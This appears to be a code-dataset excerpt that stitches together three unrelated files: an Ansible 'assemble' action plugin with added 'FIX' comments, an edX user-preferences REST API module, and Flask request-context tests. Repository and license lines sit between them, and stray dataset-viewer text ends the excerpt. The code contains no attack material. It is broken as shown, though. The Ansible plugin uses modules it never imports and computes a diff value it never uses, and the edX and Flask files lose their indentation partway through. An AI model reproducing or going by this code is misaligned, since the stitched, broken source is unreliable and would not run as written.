from ansible.runner.return_data import ReturnData
class ActionModule(object):
    """
    Action plugin for the ``assemble`` module: concatenates a sorted
    directory of file fragments into a single file and copies it to the
    target host when its content differs from the current destination.
    """

    TRANSFERS_FILES = True

    def __init__(self, runner):
        self.runner = runner

    def _assemble_from_fragments(self, src_path, delimiter=None, compiled_regexp=None):
        ''' assemble a file from a directory of fragments '''
        tmpfd, temp_path = tempfile.mkstemp()
        tmp = os.fdopen(tmpfd, 'w')
        delimit_me = False
        add_newline = False

        for f in sorted(os.listdir(src_path)):
            if compiled_regexp and not compiled_regexp.search(f):
                continue
            fragment = "%s/%s" % (src_path, f)
            if not os.path.isfile(fragment):
                continue
            # FIX: read through a context manager so the fragment's file
            # handle is closed promptly (file(...).read() leaked the handle
            # until garbage collection).
            with open(fragment) as fragment_fh:
                fragment_content = fragment_fh.read()

            # always put a newline between fragments if the previous fragment didn't end with a newline.
            if add_newline:
                tmp.write('\n')

            # delimiters should only appear between fragments
            if delimit_me:
                if delimiter:
                    # FIX: un-escape into a local instead of reassigning the
                    # ``delimiter`` parameter; the original reassignment made
                    # every later iteration decode an already-decoded value,
                    # which could double-unescape backslash sequences.
                    unescaped_delimiter = delimiter.decode('unicode-escape')
                    tmp.write(unescaped_delimiter)
                    # always make sure there's a newline after the
                    # delimiter, so lines don't run together
                    if unescaped_delimiter[-1] != '\n':
                        tmp.write('\n')

            tmp.write(fragment_content)
            delimit_me = True
            # Track whether a separating newline is needed before the next fragment.
            add_newline = not fragment_content.endswith('\n')

        tmp.close()
        return temp_path

    def run(self, conn, tmp, module_name, module_args, inject, complex_args=None, **kwargs):
        """
        Assemble the fragments locally (or delegate to the remote module
        when remote_src is set) and copy the result to the target only
        when the assembled content differs from what is already there.
        """
        # load up options
        options = {}
        if complex_args:
            options.update(complex_args)
        options.update(utils.parse_kv(module_args))

        src = options.get('src', None)
        dest = options.get('dest', None)
        delimiter = options.get('delimiter', None)
        remote_src = utils.boolean(options.get('remote_src', 'yes'))
        regexp = options.get('regexp', None)

        if src is None or dest is None:
            result = dict(failed=True, msg="src and dest are required")
            return ReturnData(conn=conn, comm_ok=False, result=result)

        if remote_src:
            # Fragments already live on the target; let the remote module assemble them.
            return self.runner._execute_module(conn, tmp, 'assemble', module_args, inject=inject, complex_args=complex_args)
        elif '_original_file' in inject:
            src = utils.path_dwim_relative(inject['_original_file'], 'files', src, self.runner.basedir)
        else:
            # the source is local, so expand it here
            src = os.path.expanduser(src)

        _re = None
        if regexp is not None:
            _re = re.compile(regexp)

        # Does all work assembling the file
        path = self._assemble_from_fragments(src, delimiter, _re)

        path_checksum = utils.checksum_s(path)
        dest = self.runner._remote_expand_user(conn, dest, tmp)
        remote_checksum = self.runner._remote_checksum(conn, tmp, dest, inject)

        if path_checksum != remote_checksum:
            # FIX: close the assembled file after reading it (was file(path).read()).
            with open(path) as assembled_fh:
                resultant = assembled_fh.read()
            if self.runner.diff:
                dest_result = self.runner._execute_module(conn, tmp, 'slurp', "path=%s" % dest, inject=inject, persist_files=True)
                if 'content' in dest_result.result:
                    dest_contents = dest_result.result['content']
                    if dest_result.result['encoding'] == 'base64':
                        dest_contents = base64.b64decode(dest_contents)
                    else:
                        raise Exception("unknown encoding, failed: %s" % dest_result.result)
            xfered = self.runner._transfer_str(conn, tmp, 'src', resultant)

            # fix file permissions when the copy is done as a different user
            if self.runner.become and self.runner.become_user != 'root':
                self.runner._remote_chmod(conn, 'a+r', xfered, tmp)

            # run the copy module
            new_module_args = dict(
                src=xfered,
                dest=dest,
                original_basename=os.path.basename(src),
            )
            module_args_tmp = utils.merge_module_args(module_args, new_module_args)

            if self.runner.noop_on_check(inject):
                return ReturnData(conn=conn, comm_ok=True, result=dict(changed=True), diff=dict(before_header=dest, after_header=src, after=resultant))
            else:
                res = self.runner._execute_module(conn, tmp, 'copy', module_args_tmp, inject=inject)
                res.diff = dict(after=resultant)
                return res
        else:
            # Content already matches: run the 'file' module so ownership/mode
            # arguments are still applied to the destination.
            # FIX: the original passed src=xfered here, but 'xfered' is only
            # assigned on the changed path above, so this branch always raised
            # NameError when the checksums matched.
            new_module_args = dict(
                dest=dest,
                original_basename=os.path.basename(src),
            )

            # make sure checkmod is passed on correctly
            if self.runner.noop_on_check(inject):
                new_module_args['CHECKMODE'] = True

            module_args_tmp = utils.merge_module_args(module_args, new_module_args)

            return self.runner._execute_module(conn, tmp, 'file', module_args_tmp, inject=inject)
| gpl-3.0 |
JioEducation/edx-platform | openedx/core/djangoapps/user_api/preferences/views.py | 60 | 10869 | """
NOTE: this API is WIP and has not yet been approved. Do not use this API
without talking to Christina or Andy.
For more information, see:
https://openedx.atlassian.net/wiki/display/TNL/User+API
"""
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import permissions
from django.db import transaction
from django.utils.translation import ugettext as _
from openedx.core.lib.api.authentication import (
SessionAuthenticationAllowInactiveUser,
OAuth2AuthenticationAllowInactiveUser,
)
from openedx.core.lib.api.parsers import MergePatchParser
from openedx.core.lib.api.permissions import IsUserInUrlOrStaff
from ..errors import UserNotFound, UserNotAuthorized, PreferenceValidationError, PreferenceUpdateError
from .api import (
get_user_preference, get_user_preferences, set_user_preference, update_user_preferences, delete_user_preference
)
class PreferencesView(APIView):
    """
    **Use Cases**

        Get or update the preference information for a user. Updates are
        only supported through merge patch; a preference whose value is
        null in a patch request is treated as a request to remove that
        preference.

    **Example Requests**

        GET /api/user/v1/preferences/{username}/

        PATCH /api/user/v1/preferences/{username}/ with content_type
        "application/merge-patch+json"

    **Response Values for GET**

        If no user exists with the specified username, an HTTP 404 "Not
        Found" response is returned. A user without "is_staff" access who
        requests preferences for a different user also receives an HTTP
        404 "Not Found" response.

        If the user makes the request for her own account, or makes a
        request for another account and has "is_staff" access, an HTTP 200
        "OK" response is returned. The response contains a JSON dictionary
        with a key/value pair (of type String) for each preference.

        The list of preferences depends on your implementation. By
        default, the list includes the following preferences.

        * account_privacy: The user's setting for sharing her personal
          profile. Possible values are "all_users" or "private".

        * pref-lan: The user's preferred language, as set in account
          settings.

    **Response Values for PATCH**

        Users can only modify their own preferences. If the requesting
        user does not have the specified username and has staff access,
        the request returns an HTTP 403 "Forbidden" response. If the
        requesting user does not have staff access, the request returns
        an HTTP 404 "Not Found" response to avoid revealing the existence
        of the account.

        If no user exists with the specified username, an HTTP 404 "Not
        Found" response is returned.

        If "application/merge-patch+json" is not the specified content
        type, a 415 "Unsupported Media Type" response is returned.

        If validation errors prevent the update, this method returns a
        400 "Bad Request" response that includes a "field_errors" field
        that lists all error messages. If some other failure prevents the
        update, a 400 "Bad Request" response with specific errors is
        returned.

        If the update is successful, an HTTP 204 "No Content" response is
        returned with no additional content.
    """
    authentication_classes = (OAuth2AuthenticationAllowInactiveUser, SessionAuthenticationAllowInactiveUser)
    permission_classes = (permissions.IsAuthenticated, IsUserInUrlOrStaff)
    parser_classes = (MergePatchParser,)

    def get(self, request, username):
        """
        GET /api/user/v1/preferences/{username}/
        """
        try:
            preferences = get_user_preferences(request.user, username=username)
        except UserNotAuthorized:
            return Response(status=status.HTTP_403_FORBIDDEN)
        except UserNotFound:
            return Response(status=status.HTTP_404_NOT_FOUND)
        else:
            return Response(preferences)

    def patch(self, request, username):
        """
        PATCH /api/user/v1/preferences/{username}/
        """
        data = request.data
        # Reject empty bodies and non-dict payloads up front.
        if not data or not getattr(data, "keys", None):
            message = _("No data provided for user preference update")
            return Response(
                {
                    "developer_message": message,
                    "user_message": message,
                },
                status=status.HTTP_400_BAD_REQUEST,
            )

        try:
            # Apply the whole merge patch atomically: either every
            # preference change lands, or none of them do.
            with transaction.atomic():
                update_user_preferences(request.user, data, user=username)
        except UserNotAuthorized:
            return Response(status=status.HTTP_403_FORBIDDEN)
        except UserNotFound:
            return Response(status=status.HTTP_404_NOT_FOUND)
        except PreferenceValidationError as error:
            return Response(
                {"field_errors": error.preference_errors},
                status=status.HTTP_400_BAD_REQUEST,
            )
        except PreferenceUpdateError as error:
            return Response(
                {
                    "developer_message": error.developer_message,
                    "user_message": error.user_message,
                },
                status=status.HTTP_400_BAD_REQUEST,
            )

        return Response(status=status.HTTP_204_NO_CONTENT)
class PreferencesDetailView(APIView):
"""
**Use Cases**
Get, create, update, or delete a specific user preference.
**Example Requests**
GET /api/user/v1/preferences/{username}/{preference_key}
PUT /api/user/v1/preferences/{username}/{preference_key}
DELETE /api/user/v1/preferences/{username}/{preference_key}
**Response Values for GET**
If the specified username or preference does not exist, an HTTP
404 "Not Found" response is returned.
If a user without "is_staff" access requests preferences for a
different user, a 404 error is returned.
If the user makes the request for her own account, or makes a
request for another account and has "is_staff" access, an HTTP 200
"OK" response is returned that contains a JSON string.
**Response Values for PUT**
Users can only modify their own preferences. If the
requesting user does not have the specified username and has staff
access, the request returns an HTTP 403 "Forbidden" response. If
the requesting user does not have staff access, the request
returns an HTTP 404 "Not Found" response to avoid revealing the
existence of the account.
If the specified preference does not exist, an HTTP 404 "Not
Found" response is returned.
If the request is successful, a 204 "No Content" status is returned
with no additional content.
**Response Values for DELETE**
Users can only delete their own preferences. If the
requesting user does not have the specified username and has staff
access, the request returns an HTTP 403 "Forbidden" response. If
the requesting user does not have staff access, the request
returns an HTTP 404 "Not Found" response to avoid revealing the
existence of the account.
If the specified preference does not exist, an HTTP 404 "Not
Found" response is returned.
If the update is successful, an HTTP 204 "No Content" response is
returned with no additional content.
"""
authentication_classes = (OAuth2AuthenticationAllowInactiveUser, SessionAuthenticationAllowInactiveUser)
permission_classes = (permissions.IsAuthenticated, IsUserInUrlOrStaff)
def get(self, request, username, preference_key):
"""
GET /api/user/v1/preferences/{username}/{preference_key}
"""
try:
value = get_user_preference(request.user, preference_key, username=username)
# There was no preference with that key, raise a 404.
if value is None:
return Response(status=status.HTTP_404_NOT_FOUND)
except UserNotAuthorized:
return Response(status=status.HTTP_403_FORBIDDEN)
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
return Response(value)
def put(self, request, username, preference_key):
"""
PUT /api/user/v1/preferences/{username}/{preference_key}
"""
try:
set_user_preference(request.user, preference_key, request.data, username=username)
except UserNotAuthorized:
return Response(status=status.HTTP_403_FORBIDDEN)
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
except PreferenceValidationError as error:
return Response(
{
"developer_message": error.preference_errors[preference_key]["developer_message"],
"user_message": error.preference_errors[preference_key]["user_message"]
},
status=status.HTTP_400_BAD_REQUEST
)
except PreferenceUpdateError as error:
return Response(
{
"developer_message": error.developer_message,
"user_message": error.user_message
},
status=status.HTTP_400_BAD_REQUEST
)
return Response(status=status.HTTP_204_NO_CONTENT)
def delete(self, request, username, preference_key):
"""
DELETE /api/user/v1/preferences/{username}/{preference_key}
"""
try:
preference_existed = delete_user_preference(request.user, preference_key, username=username)
except UserNotAuthorized:
return Response(status=status.HTTP_403_FORBIDDEN)
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
except PreferenceUpdateError as error:
return Response(
{
"developer_message": error.developer_message,
"user_message": error.user_message
},
status=status.HTTP_400_BAD_REQUEST
)
if not preference_existed:
return Response(status=status.HTTP_404_NOT_FOUND)
return Response(status=status.HTTP_204_NO_CONTENT)
| agpl-3.0 |
# -*- coding: utf-8 -*-
"""
tests.reqctx
~~~~~~~~~~~~
Tests the request context.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import pytest
import flask
try:
from greenlet import greenlet
except ImportError:
greenlet = None
def test_teardown_on_pop():
buffer = []
app = flask.Flask(__name__)
@app.teardown_request
def end_of_request(exception):
buffer.append(exception)
ctx = app.test_request_context()
ctx.push()
assert buffer == []
ctx.pop()
assert buffer == [None]
def test_teardown_with_previous_exception():
buffer = []
app = flask.Flask(__name__)
@app.teardown_request
def end_of_request(exception):
buffer.append(exception)
try:
raise Exception('dummy')
except Exception:
pass
with app.test_request_context():
assert buffer == []
assert buffer == [None]
def test_teardown_with_handled_exception():
buffer = []
app = flask.Flask(__name__)
@app.teardown_request
def end_of_request(exception):
buffer.append(exception)
with app.test_request_context():
assert buffer == []
try:
raise Exception('dummy')
except Exception:
pass
assert buffer == [None]
def test_proper_test_request_context():
app = flask.Flask(__name__)
app.config.update(
SERVER_NAME='localhost.localdomain:5000'
)
@app.route('/')
def index():
return None
@app.route('/', subdomain='foo')
def sub():
return None
with app.test_request_context('/'):
assert flask.url_for('index', _external=True) == \
'http://localhost.localdomain:5000/'
with app.test_request_context('/'):
assert flask.url_for('sub', _external=True) == \
'http://foo.localhost.localdomain:5000/'
try:
with app.test_request_context('/', environ_overrides={'HTTP_HOST': 'localhost'}):
pass
except ValueError as e:
assert str(e) == (
"the server name provided "
"('localhost.localdomain:5000') does not match the "
"server name from the WSGI environment ('localhost')"
)
app.config.update(SERVER_NAME='localhost')
with app.test_request_context('/', environ_overrides={'SERVER_NAME': 'localhost'}):
pass
app.config.update(SERVER_NAME='localhost:80')
with app.test_request_context('/', environ_overrides={'SERVER_NAME': 'localhost:80'}):
pass
def test_context_binding():
app = flask.Flask(__name__)
@app.route('/')
def index():
return 'Hello %s!' % flask.request.args['name']
@app.route('/meh')
def meh():
return flask.request.url
with app.test_request_context('/?name=World'):
assert index() == 'Hello World!'
with app.test_request_context('/meh'):
assert meh() == 'http://localhost/meh'
assert flask._request_ctx_stack.top is None
def test_context_test():
app = flask.Flask(__name__)
assert not flask.request
assert not flask.has_request_context()
ctx = app.test_request_context()
ctx.push()
try:
assert flask.request
assert flask.has_request_context()
finally:
ctx.pop()
def test_manual_context_binding():
app = flask.Flask(__name__)
@app.route('/')
def index():
return 'Hello %s!' % flask.request.args['name']
ctx = app.test_request_context('/?name=World')
ctx.push()
assert index() == 'Hello World!'
ctx.pop()
try:
index()
except RuntimeError:
pass
else:
assert 0, 'expected runtime error'
@pytest.mark.skipif(greenlet is None, reason='greenlet not installed')
def test_greenlet_context_copying():
app = flask.Flask(__name__)
greenlets = []
@app.route('/')
def index():
reqctx = flask._request_ctx_stack.top.copy()
def g():
assert not flask.request
assert not flask.current_app
with reqctx:
assert flask.request
assert flask.current_app == app
assert flask.request.path == '/'
assert flask.request.args['foo'] == 'bar'
assert not flask.request
return 42
greenlets.append(greenlet(g))
return 'Hello World!'
rv = app.test_client().get('/?foo=bar')
assert rv.data == b'Hello World!'
result = greenlets[0].run()
assert result == 42
@pytest.mark.skipif(greenlet is None, reason='greenlet not installed')
def test_greenlet_context_copying_api():
app = flask.Flask(__name__)
greenlets = []
@app.route('/')
def index():
reqctx = flask._request_ctx_stack.top.copy()
@flask.copy_current_request_context
def g():
assert flask.request
assert flask.current_app == app
assert flask.request.path == '/'
assert flask.request.args['foo'] == 'bar'
return 42
greenlets.append(greenlet(g))
return 'Hello World!'
rv = app.test_client().get('/?foo=bar')
assert rv.data == b'Hello World!'
result = greenlets[0].run()
assert result == 42
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.